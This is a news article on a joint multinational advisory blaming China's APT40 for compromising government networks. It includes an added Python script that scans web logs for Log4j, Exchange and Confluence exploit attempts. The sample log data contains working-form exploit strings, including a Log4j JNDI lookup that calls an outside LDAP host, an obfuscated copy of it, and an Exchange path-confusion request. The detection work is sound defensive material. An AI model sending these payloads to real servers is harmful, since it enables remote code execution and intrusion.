Global Coalition Blames China’s APT40 for Hacking Government Networks

Seven nations are backing Australia in calling out a China-linked hacking group for compromising government networks.


The US, UK, Canada, Germany, Japan, New Zealand, and South Korea are backing Australia in blaming Chinese state-sponsored threat actors for hacking into government networks.

Following the March 2024 sanctions against members of the Chinese advanced persistent threat (APT) actor APT31, the eight nations are now drawing attention to the tradecraft of APT40 – also known as Bronze Mohawk, Gingham Typhoon, Kryptonite Panda, and Leviathan.

“APT40 has repeatedly targeted Australian networks as well as government and private sector networks in the region, and the threat they pose to our networks is ongoing,” reads a joint advisory from government agencies in those countries.

The group regularly conducts reconnaissance against networks in the authoring agencies’ countries to identify outdated, vulnerable devices it can exploit.

APT40 has been observed quickly adopting exploits for new vulnerabilities, including bugs in widely used software such as Atlassian Confluence (CVE-2021-26084), Log4j (CVE-2021-44228), and Microsoft Exchange (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473).

According to the authoring agencies, the Chinese state-sponsored threat actor is expected “to continue using PoCs for new high-profile vulnerabilities within hours or days of public release”.

According to the advisory, APT40 prefers to exploit vulnerable, internet-facing infrastructure for initial access rather than using phishing or other techniques requiring user interaction. The malicious group has also been exfiltrating credentials for follow-up operations and establishing persistence early in the attack chain.

The hacking group was also seen compromising legacy small-office/home-office (SOHO) devices and relying on them as launching points for subsequent attacks that blend in with legitimate network traffic.


“This technique is also regularly used by other PRC state-sponsored actors worldwide, and the authoring agencies consider this to be a shared threat,” the advisory reads.

As part of a targeted attack, the threat actor successfully maintained access to an Australian organization’s network between July and September 2022, established multiple access vectors to the network, exfiltrated large amounts of data, and moved laterally.

In another incident, the China-linked group compromised an organization’s remote access login portal that was likely vulnerable to a publicly disclosed remote code execution (RCE) flaw. The attackers exfiltrated “several hundred unique username and password pairs on the compromised appliance”.

To mitigate the risk of similar attacks, organizations are advised to implement comprehensive logging, promptly patch all internet-accessible appliances, segment their networks, disable unused services, ports, and protocols, enforce multi-factor authentication, and replace legacy equipment.
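The "comprehensive logging" recommendation only pays off if the logs are actually examined for the kind of exploit attempts the article describes. The following Python script is an added example written for this page, not code from the advisory, CISA or SecurityWeek: it parses constructed web-server access-log lines and flags request patterns associated with the three vulnerability families named earlier (Log4j JNDI lookups, the Exchange autodiscover path confusion, and the Confluence OGNL injection endpoint). The log lines, IP addresses and rule signatures are the editor's own, modelled on public descriptions of those bugs; the advisory itself publishes no such indicators.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample access-log lines in Apache/nginx "combined" format (not real traffic).
# Addresses come from documentation ranges; the hostile payloads are modelled on public
# descriptions of the three vulnerability families the article names.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Jul/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [08/Jul/2024:10:01:05 +0000] "GET /login HTTP/1.1" 200 800 "-" "${jndi:ldap://198.51.100.5:1389/a}"
203.0.113.9 - - [08/Jul/2024:10:01:06 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.5%2Fa%7D HTTP/1.1" 404 0 "-" "curl/8.0"
203.0.113.11 - - [08/Jul/2024:10:02:00 +0000] "POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 200 3000 "-" "python-requests/2.31"
203.0.113.11 - - [08/Jul/2024:10:02:30 +0000] "POST /autodiscover/autodiscover.json?@test.local/mapi/nspi?a=b HTTP/1.1" 200 100 "-" "python-requests/2.31"
203.0.113.7 - - [08/Jul/2024:10:03:00 +0000] "GET /owa/ HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each rule: (name, CVE from the article, regex applied to the normalised field, confidence).
# The signatures are the editor's assumptions based on public write-ups, not advisory content.
RULES = [
    ("log4j_jndi_lookup", "CVE-2021-44228", re.compile(r"\$\{jndi:"), "high"),
    # Exchange path confusion: an '@' inside the autodiscover.json request target.
    ("exchange_autodiscover_confusion", "CVE-2021-34473",
     re.compile(r"/autodiscover/autodiscover\.json[^ ]*@"), "high"),
    # Confluence OGNL injection endpoint. The injected parameter travels in the POST body,
    # which access logs do not record, so this is a review-level indicator only.
    ("confluence_ognl_endpoint", "CVE-2021-26084",
     re.compile(r"/pages/(?:createpage-entervariables|doenterpagevariables)\.action"), "review"),
]


def normalize(value: str) -> str:
    """Undo the common evasions an exploit payload is wrapped in before matching."""
    for _ in range(2):              # payloads are often double-URL-encoded
        value = unquote(value)
    value = value.lower()
    previous = None
    while previous != value:        # peel nested Log4j lookups from the inside out
        previous = value
        value = re.sub(r"\$\{(?:lower|upper):([^}${]*)\}", r"\1", value)   # ${lower:j} -> j
        value = re.sub(r"\$\{[^}${]*:-([^}${]*)\}", r"\1", value)          # ${::-j}, ${env:x:-j} -> j
    return value


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_log(text: str):
    """Return one finding per (line, rule) match; fields are checked after normalisation."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = parse_line(line)
        if not entry:
            continue
        for field in ("path", "ua", "referer"):
            value = normalize(entry[field])
            for name, cve, pattern, confidence in RULES:
                if pattern.search(value):
                    findings.append({"line": lineno, "ip": entry["ip"], "field": field,
                                     "rule": name, "cve": cve, "confidence": confidence})
    return findings


def sources_by_family(findings):
    """Map source IP -> set of CVEs it probed; one source hitting several families is notable."""
    by_ip = defaultdict(set)
    for f in findings:
        by_ip[f["ip"]].add(f["cve"])
    return dict(by_ip)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"line {h['line']:>2} {h['ip']:<13} {h['confidence']:<6} {h['cve']} "
              f"via {h['field']} ({h['rule']})")
    for ip, cves in sources_by_family(hits).items():
        print(ip, "->", sorted(cves))
```

The normalisation step matters more than the signatures: the same JNDI lookup appears once in a User-Agent header in plain form and once in a URL-encoded, case-obfuscated query string, and both collapse to the same `${jndi:` token. The Confluence rule is deliberately marked review-level because an access log never shows the request body where the injection lives. Grouping hits by source address is what surfaces the behaviour the article describes, a single host probing several unrelated vulnerability families in quick succession.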

All organizations and software manufacturers are advised “to review the advisory to help identify, prevent, and remediate APT 40 intrusions. Software vendors are also urged to incorporate Secure by Design principles into their practices to limit the impact of threat actor techniques and to strengthen the security posture of their products for their customers,” the US cybersecurity agency CISA notes.

Related: Cisco Patches NX-OS Zero-Day Exploited by Chinese Cyberspies

Related: 22 Chinese Nationals Sentenced to Long Prison Terms in Zambia for Multinational Cybercrimes

Related: Chinese Hackers Target Energy Firms in South China Sea

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
